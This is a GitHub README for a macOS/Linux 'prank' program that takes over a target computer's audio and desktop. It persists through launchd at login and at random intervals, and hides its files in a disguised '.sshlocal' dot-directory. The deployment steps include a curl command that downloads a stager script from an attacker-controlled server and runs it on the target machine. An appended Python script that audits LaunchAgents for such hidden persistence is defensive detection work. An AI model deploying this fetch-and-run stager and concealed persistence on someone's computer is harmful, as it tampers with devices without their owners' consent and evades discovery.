Hippi3Hack3r/PrankMalware

Prankware

Why

Hi! This program was developed to settle a score between friendly rivals. I couldn't find a program to do what I wanted on OSX so I wrote my own. Please do not use this software maliciously.

What does this program do?

This program takes over the target computer's volume and blasts audio from a wav file of your choice. AC/DC is encouraged but not required. The music will also play upon machine startup, after a logout followed by a login, and at random intervals between 1 and 4 hours.

84% of development was done on a Saturday afternoon, so there are probably lots of bugs. Feel free to create an issue, or better yet, fix it and create a Pull Request.

The music file is this jam from pixelbay. You can use whatever file you want; just rename it to "apple-sound1".

(Mac only) This program ALSO changes the computer's background to plain black and every so often flashes "The Matrix has you."

MITRE ATT&CK tactics employed:

TA0003 - Persistence: Scripts are loaded up on login.
T1027 - Obfuscation: Program files are stored in a directory starting with a '.', which means they will be harder to discover.

Installation

The target machine needs to have a python3 interpreter. The program does not require root permissions and is designed to be run without any extra dependencies. (This was not entirely possible on Linux.)

How you deploy the program is your choice. Here's how I did it:

  1. Clone the repository.
  2. Zip the contents of the .sshlocal directory and upload the archive to a server you control.
  3. Upload a .wav file to the same location on the server and name it "apple-sound1.wav" (anything else and you'll need to edit the scripts).
  4. Profit.

Usage

For now, this program is intended to be run on a target machine you have access to. On that machine run:

curl -O https://server-hosting-the-files/stager.sh
chmod +x stager.sh
./stager.sh

stager.sh handles the install process: it pulls down the zip files and runs the installer, as long as the steps in the Installation section have been followed.

To remove the program (sorry I'm not THAT evil)

launchd is used to run the python script. To stop it immediately and remove the plist file, run the install script in the .sshlocal directory with the -r flag.
install.sh --remove
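
A defender-side check for the persistence pattern this README describes (a launchd job that runs a script out of a dot-directory at login), added here as an example and not part of this repository. The README does not show its plist, so the label, the `player.py` file name and the user path in the sample are constructed; the launchd keys inspected are the standard ones.

```python
import plistlib
from pathlib import Path, PurePosixPath

def hidden_components(path):
    """Return the path components that start with '.' (ignoring '.' and '..')."""
    return [p for p in PurePosixPath(path).parts
            if p.startswith(".") and p not in (".", "..")]

def audit_plist(data):
    """Inspect one launchd job (raw plist bytes); return a list of findings."""
    try:
        job = plistlib.loads(data)
    except Exception:
        return ["unparseable plist"]
    if not isinstance(job, dict):
        return ["unparseable plist"]
    # launchd takes the command from Program and/or ProgramArguments.
    args = list(job.get("ProgramArguments") or [])
    if job.get("Program"):
        args.insert(0, job["Program"])
    findings = [f"runs from hidden path: {a}" for a in args
                if isinstance(a, str) and "/" in a and hidden_components(a)]
    # Only report the triggers when the job already points into a dot-directory.
    if findings and job.get("RunAtLoad"):
        findings.append("RunAtLoad set: starts at every login")
    if findings and (job.get("StartInterval") or job.get("StartCalendarInterval")):
        findings.append("scheduled re-run configured")
    return findings

def audit_launch_agents(directory=None):
    """Audit every *.plist in a LaunchAgents directory; return {file name: findings}."""
    directory = Path(directory) if directory else Path.home() / "Library" / "LaunchAgents"
    report = {}
    if directory.is_dir():
        for plist in sorted(directory.glob("*.plist")):
            found = audit_plist(plist.read_bytes())
            if found:
                report[plist.name] = found
    return report

# Constructed sample: a per-user job shaped like the one the README describes.
SAMPLE = plistlib.dumps({
    "Label": "com.example.constructed",
    "ProgramArguments": ["/usr/bin/python3", "/Users/alice/.sshlocal/player.py"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    print(audit_plist(SAMPLE))
    print(audit_launch_agents())
```

Run without arguments, `audit_launch_agents()` checks the current user's `~/Library/LaunchAgents`, which is where a job installed without root permissions would live.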
